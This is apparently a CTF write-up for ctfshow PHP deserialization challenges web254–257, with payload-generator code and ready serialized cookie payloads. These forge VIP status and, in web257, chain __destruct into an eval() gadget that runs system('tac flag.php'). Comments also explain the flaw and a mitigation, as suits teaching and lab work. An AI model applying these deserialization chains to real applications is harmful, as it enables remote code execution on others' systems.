web254
username=xxxxxx&password=xxxxxx
web255
<?php
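class ctfShowUser{
    /**
     * Minimal stand-in for the challenge's ctfShowUser class, used only to
     * obtain the serialized form shown on the next lines.
     *
     * Only the property that the check reads is declared. serialize() emits
     * public properties under their plain name, so the result is
     * O:11:"ctfShowUser":1:{s:5:"isVip";b:1;}. The property is typed so a
     * stray non-bool assignment fails loudly instead of changing the output.
     */
    public bool $isVip = true;
}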
// Serialize first, then dump with its length so the value can be copied verbatim.
$serialized = serialize(new ctfShowUser());
var_dump($serialized);
?>
运行结果:
string(39) "O:11:"ctfShowUser":1:{s:5:"isVip";b:1;}"
抓包后在请求中添加以下信息:
/?username=xxxxxx&password=xxxxxx
cookie:user=O:11:"ctfShowUser":1:{s:5:"isVip"%3bb:1%3b}"
web256
<?php
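class ctfShowUser{
    /**
     * Minimal stand-in for the challenge's ctfShowUser class, used only to
     * obtain the serialized form shown on the next lines.
     *
     * Both properties are public, so serialize() emits them under their plain
     * names in declaration order:
     * O:11:"ctfShowUser":2:{s:5:"isVip";b:1;s:8:"username";s:8:"anything";}.
     * The username value here has to agree with the username sent in the GET
     * request below. Properties are typed so accidental reassignment with a
     * different type fails instead of silently changing the output.
     */
    public bool $isVip = true;
    public string $username = 'anything';
}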
// Serialize first, then dump with its length so the value can be copied verbatim.
$serialized = serialize(new ctfShowUser());
var_dump($serialized);
?>
运行结果为:
string(69) "O:11:"ctfShowUser":2:{s:5:"isVip";b:1;s:8:"username";s:8:"anything";}"
编码对象以及结果如下:
O:11:"ctfShowUser":2:{s:5:"isVip";b:1;s:8:"username";s:8:"anything";}
O%3A11%3A%22ctfShowUser%22%3A2%3A%7Bs%3A5%3A%22isVip%22%3Bb%3A1%3Bs%3A8%3A%22username%22%3Bs%3A8%3A%22anything%22%3B%7D
GET 型传参:
?username=anything&password=xxxxxx
web257
/**
 * Application-side user class from the challenge source.
 *
 * Security note: instances of this class are rebuilt by unserialize() from a
 * client-controlled cookie (see the request handler below), so every magic
 * method here runs on attacker-chosen property values. __destruct() calls
 * getInfo() on whatever object is stored in $class without checking its type.
 */
class ctfShowUser{
# Values that do not matter for the chain; the serialized payload leaves them out.
private $username='xxxxxx';
private $password='xxxxxx';
private $isVip=false;
# Read by __destruct(); the stored value can be replaced through the serialized data.
private $class = 'info';
# Constructor: runs on `new` only, never on unserialize(), so this initialisation
# is not applied to objects rebuilt from the cookie.
public function __construct(){
# This slot normally holds an info object; in deserialized data it can hold a
# different class (the code that executes lives in backDoor).
$this->class=new info();
}
# Methods are not part of the serialized form; only properties are.
public function login($u,$p){
return $this->username===$u&&$this->password===$p;
}
# Called automatically when the object is destroyed; dispatches getInfo() on
# $class without an instanceof check, which is the link the chain relies on.
public function __destruct(){
$this->class->getInfo();
}
}
# Not involved in the chain; the payload does not need it.
/**
 * Harmless default target of ctfShowUser::__destruct(): getInfo() only
 * returns a private string. It is the class the constructor installs, and the
 * one the deserialized data replaces.
 */
class info{
private $user='xxxxxx';
# Returns the stored user string; no side effects.
public function getInfo(){
return $this->user;
}
}
# The class the chain ends in.
/**
 * Gadget class: shares the getInfo() method name with info, so an instance can
 * sit in ctfShowUser::$class and be reached from __destruct().
 *
 * Security note: eval() on a property value is an arbitrary-code-execution
 * sink; because this class can be instantiated by unserialize() with an
 * attacker-chosen $code, the sink is reachable from the cookie. The class is
 * never used legitimately and should not exist in application code at all.
 */
class backDoor{
# Attacker-controlled in the chain: set directly by the serialized data.
private $code;
# Methods are never serialized; only the $code property travels in the payload.
public function getInfo(){
# eval() on data that can come from unserialize() — the execution sink.
eval($this->code);
}
}
# Request handler. unserialize() is applied directly to a client-controlled
# cookie, which is the root vulnerability: any class in scope can be
# instantiated with attacker-chosen property values, and its magic methods
# (__destruct, __wakeup, ...) run without further checks.
# Mitigation: keep session state server-side or use json_decode(); if
# unserialize() must stay, pass ['allowed_classes' => false] (or a strict
# allow-list) so no objects are created from the cookie.
$username=$_GET['username'];
$password=$_GET['password'];
# isset() is false when either GET key is missing (the lookup yields null).
if(isset($username) && isset($password)){
$user = unserialize($_COOKIE['user']);
# login() is called on whatever unserialize() returned; the object's
# __destruct() runs when it goes out of scope regardless of this call's outcome.
$user->login($username,$password);
}
#最终代码如下。对序列化结果调用 urlencode 函数进行编码(不是加密),因为私有属性序列化后属性名两侧带有 %00(NUL)字节,
#直接复制会丢失这些字节,导致载荷不完整。
<?php
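class ctfShowUser{
    /**
     * Payload generator: a reduced copy of the application's ctfShowUser that
     * keeps only the property the application's __destruct() reads.
     *
     * The property stays private so its serialized name matches the
     * application class: private names are emitted as "\0ctfShowUser\0class",
     * and those NUL bytes are why the result is urlencoded below.
     */
    private backDoor $class;

    public function __construct()
    {
        // Nest the gadget object under the private property so the serialized
        // graph mirrors what the application's __destruct() dereferences.
        $this->class = new backDoor();
    }
}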
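class backDoor{
    /**
     * Reduced copy of the application's backDoor class for serialization.
     *
     * Only the private $code property is declared; methods are never part of
     * the serialized form. The private name serializes as "\0backDoor\0code"
     * (14 bytes). Its value is the string the application's eval() sink would
     * receive — the page's demonstration of why unserialize() on client input
     * must not be used.
     */
    private string $code = 'system("tac flag.php");';
}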
// urlencode keeps the NUL bytes of the private property names visible as %00.
$serialized = serialize(new ctfShowUser());
var_dump(urlencode($serialized));
?>
运行结果如下:
string(201) "O%3A11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A18%3A%22%00ctfShowUser%00class%22%3BO%3A8%3A%22backDoor%22%3A1%3A%7Bs%3A14%3A%22%00backDoor%00code%22%3Bs%3A23%3A%22system%28%22tac+flag.php%22%29%3B%22%3B%7D%7D"